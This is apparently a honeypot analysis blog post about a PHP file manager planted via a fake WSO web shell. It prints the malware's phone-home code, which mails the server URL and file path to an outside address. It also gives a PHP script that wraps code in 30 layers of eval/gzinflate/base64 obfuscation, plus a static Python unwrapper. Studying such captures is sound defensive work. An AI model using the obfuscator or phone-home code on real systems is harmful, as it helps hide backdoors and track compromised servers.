A home-grown file manager, with a phone home.
* TeaM HacKer EgypT - a simple Web-based file manager
* Copyright (C) 2004 TeaM HacKer EgypT <I0X0@HOTMAIL.COM>
Licensed under GNU GPL v2. Damned nice of them.
TeaM HacKer EgypT even has a Facebook page. Touching.
The attacker believed the file would be downloaded by an instance of WSO (Web Shell by oRb), using the "FilesMan" action with the "uploadFile" sub-action.
It should have ended up in the file /var/www/html/wordpress//wp-content/plugins/wp-mobile-detector/cache/admin.php.
But it was a fake WSO, part of a WordPress honey pot,
so it's here to amuse you.
37.160.35.41.in-addr.arpa name = host-41.35.160.37.tedata.net.
"host-41.35.160.37.tedata.net" does not have an A record.
tedata.net is a GoDaddy.com domain, with an Egyptian registrant:
Domain Name: TEDATA.NET
Registry Domain ID: 73801006_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2017-06-29T11:58:58Z
Creation Date: 2001-06-28T14:13:59Z
Registrar Registration Expiration Date: 2018-06-28T14:13:58Z
Registrant Street: 94 Tahrir St.
Registrant City: Giza
Registrant State/Province: Giza
Registrant Postal Code: 12311
Registrant Country: EG
Tedious, but easy encoding: the original source got gzdeflate(), then base64_encode(), then eval(). For 30 levels.
I'm not going to keep all 30 intermediate files.
Apparently there used to be a web page that would do this encoding. This comment appears in the original, most-obfuscated, code:
/*
online encode by cha88.cn!
*/
I could only find a pale imitation of it, so I wrote my own version, just to test it:
#!/usr/bin/env php
<?php
// Usage: encode.php <count> <filename>
if ($argc < 3) {
    fwrite(STDERR, "usage: {$argv[0]} <count> <filename>\n");
    exit(1);
}
$count = (int)$argv[1];
$filename = $argv[2];
$txt = file_get_contents($filename);
for ($i = 0; $i < $count; ++$i) {
    $compressed = gzdeflate($txt);         // raw DEFLATE, no zlib header
    $encoded = base64_encode($compressed);
    // wrap in the same eval() layer seen in the captured file
    $txt = 'eval(gzinflate(base64_decode("'.$encoded.'")));';
}
print $txt;
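The reverse direction is what an analyst actually needs: peel the layers off without ever running eval(). The following is an added example, not code from the original post; it re-implements the encoder in Python (zlib raw deflate, wbits=-15, is the equivalent of gzdeflate()/gzinflate()) and statically unwraps any number of eval(gzinflate(base64_decode("..."))) layers. The sample source string is constructed, not the captured payload.

```python
import base64
import re
import zlib

# One obfuscation layer, exactly as produced by the encoder in the post:
#   eval(gzinflate(base64_decode("....")));
LAYER_RE = re.compile(
    r'^\s*eval\(gzinflate\(base64_decode\("([A-Za-z0-9+/=]+)"\)\)\);\s*$'
)


def wrap_layers(source: str, count: int) -> str:
    """Apply gzdeflate -> base64 -> eval wrapper `count` times (the encoder)."""
    txt = source
    for _ in range(count):
        comp = zlib.compressobj(level=9, wbits=-15)  # raw DEFLATE == gzdeflate()
        compressed = comp.compress(txt.encode()) + comp.flush()
        encoded = base64.b64encode(compressed).decode()
        txt = f'eval(gzinflate(base64_decode("{encoded}")));'
    return txt


def peel_layers(obfuscated: str, max_layers: int = 100) -> tuple:
    """Statically remove eval/gzinflate/base64 layers; nothing is executed.

    Returns (innermost source, number of layers removed). `max_layers`
    bounds the loop so a hostile file cannot make us decompress forever.
    """
    txt = obfuscated
    layers = 0
    while layers < max_layers:
        m = LAYER_RE.match(txt)
        if not m:
            break  # no further eval() wrapper: this is the real source
        raw = base64.b64decode(m.group(1), validate=True)
        txt = zlib.decompress(raw, -15).decode()  # raw inflate == gzinflate()
        layers += 1
    return txt, layers


# Constructed stand-in for the captured file manager source.
SAMPLE = '<?php echo "simple, fast file manager"; ?>'
OBFUSCATED = wrap_layers(SAMPLE, 30)

if __name__ == "__main__":
    inner, n = peel_layers(OBFUSCATED)
    print(f"removed {n} layers; innermost source: {inner}")
```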
The PHP downloaded is in fact a simple, fast file manager.
Each file can be copied, downloaded, or serve as the target of a symbolic link. That's about it, except for the phone home.
Since WSO can do all that this simple, fast file manager can do, and much more, the question becomes why download this via WSO? You've got the WSO password, just use WSO's functions. I can think of two reasons:
- You don't know what WSO can do
- You want people to use this file manager, so you can receive the phone homes. This doesn't entirely seem worth it, because nothing other than the file manager's URL makes it into the info phoned home.
$site = "www.Sh3ll.Us";
// Only phone home when the file manager is not running on the author's own site
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
    $to = "dj_vista16@hotmail.com";
    $subject = "EGFM";
    $header = "from: EGFM <dj_vista16@hotmail.com>";
    // Report where the file manager is reachable and where it sits on disk
    $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
    $message .= "Path : " . __file__;
    $sentmail = @mail($to, $subject, $message, $header);  // errors suppressed
}
A pastebin with the same phone home. I guess ol' dj_vista16 has been busy.